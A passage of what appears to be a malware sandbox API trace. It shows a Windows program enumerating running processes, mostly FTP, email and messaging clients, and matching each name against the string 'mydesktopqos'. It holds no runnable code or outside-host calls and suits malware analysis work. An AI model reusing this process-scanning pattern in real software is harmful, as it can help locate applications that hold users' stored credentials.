th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0095.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.536] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35733f8 [0095.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x35733f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0095.536] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0095.536] StrStrIA (lpFirst="bitkinex.exe", lpSrch="mydesktopqos") returned 0x0 [0095.536] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0095.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.539] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35735a8 [0095.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x35735a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0095.539] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0095.539] StrStrIA (lpFirst="coreftp.exe", lpSrch="mydesktopqos") returned 0x0 [0095.539] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0095.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0095.540] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574dc0 [0095.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3574dc0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0095.540] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0095.540] StrStrIA (lpFirst="far.exe", lpSrch="mydesktopqos") returned 0x0 [0095.540] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0095.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.541] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3573518 [0095.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3573518, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0095.541] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0095.541] StrStrIA (lpFirst="filezilla.exe", lpSrch="mydesktopqos") returned 0x0 [0095.541] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0095.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.542] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35733b0 [0095.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x35733b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.542] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0095.542] StrStrIA (lpFirst="flashfxp.exe", lpSrch="mydesktopqos") returned 0x0 [0095.542] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0095.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.543] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35735f0 [0095.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x35735f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0095.543] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0095.543] StrStrIA (lpFirst="fling.exe", lpSrch="mydesktopqos") returned 0x0 [0095.543] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0095.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.544] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3574c08 [0095.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3574c08, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0095.544] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0095.544] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="mydesktopqos") returned 0x0 [0095.544] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0095.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.545] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3574bc8 [0095.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3574bc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0095.545] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0095.545] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="mydesktopqos") returned 0x0 [0095.545] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0095.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0095.546] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574d50 [0095.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3574d50, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0095.546] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0095.547] StrStrIA (lpFirst="icq.exe", lpSrch="mydesktopqos") returned 0x0 [0095.547] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0095.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.548] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35733c8 [0095.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x35733c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.548] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0095.548] StrStrIA (lpFirst="leechftp.exe", lpSrch="mydesktopqos") returned 0x0 [0095.548] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0095.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.549] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35734d0 [0095.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x35734d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0095.549] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0095.549] StrStrIA (lpFirst="ncftp.exe", lpSrch="mydesktopqos") returned 0x0 [0095.549] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0095.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.553] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573410 [0095.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3573410, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0095.553] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0095.553] StrStrIA (lpFirst="notepad.exe", lpSrch="mydesktopqos") returned 0x0 [0095.553] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0095.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.554] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35734e8 [0095.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x35734e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0095.554] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0095.554] StrStrIA (lpFirst="operamail.exe", lpSrch="mydesktopqos") returned 0x0 [0095.554] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0095.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.555] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573428 [0095.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3573428, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0095.555] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0095.555] StrStrIA (lpFirst="outlook.exe", lpSrch="mydesktopqos") returned 0x0 [0095.555] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0095.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.556] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35735c0 [0095.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x35735c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0095.557] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0095.557] StrStrIA (lpFirst="pidgin.exe", lpSrch="mydesktopqos") returned 0x0 [0095.557] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0095.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.558] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3573608 [0095.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3573608, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0095.558] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0095.558] StrStrIA (lpFirst="scriptftp.exe", lpSrch="mydesktopqos") returned 0x0 [0095.558] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0095.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.559] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3573500 [0095.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3573500, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0095.559] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0095.559] StrStrIA (lpFirst="skype.exe", lpSrch="mydesktopqos") returned 0x0 [0095.559] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0095.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.560] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573620 [0095.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3573620, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.560] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0095.560] StrStrIA (lpFirst="smartftp.exe", lpSrch="mydesktopqos") returned 0x0 [0095.560] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0095.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.561] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3573560 [0095.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3573560, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0095.561] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0095.561] StrStrIA (lpFirst="thunderbird.exe", lpSrch="mydesktopqos") returned 0x0 [0095.561] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0095.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.565] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573590 [0095.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3573590, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0095.566] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0095.566] StrStrIA (lpFirst="totalcmd.exe", lpSrch="mydesktopqos") returned 0x0 [0095.566] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0095.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.567] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35733e0 [0095.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x35733e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0095.567] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0095.567] StrStrIA (lpFirst="trillian.exe", lpSrch="mydesktopqos") returned 0x0 [0095.567] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0095.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.568] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573380 [0095.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3573380, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0095.568] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0095.568] StrStrIA (lpFirst="webdrive.exe", lpSrch="mydesktopqos") returned 0x0 [0095.568] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0095.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.569] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573440 [0095.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3573440, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.569] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0095.569] StrStrIA (lpFirst="whatsapp.exe", lpSrch="mydesktopqos") returned 0x0 [0095.569] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, 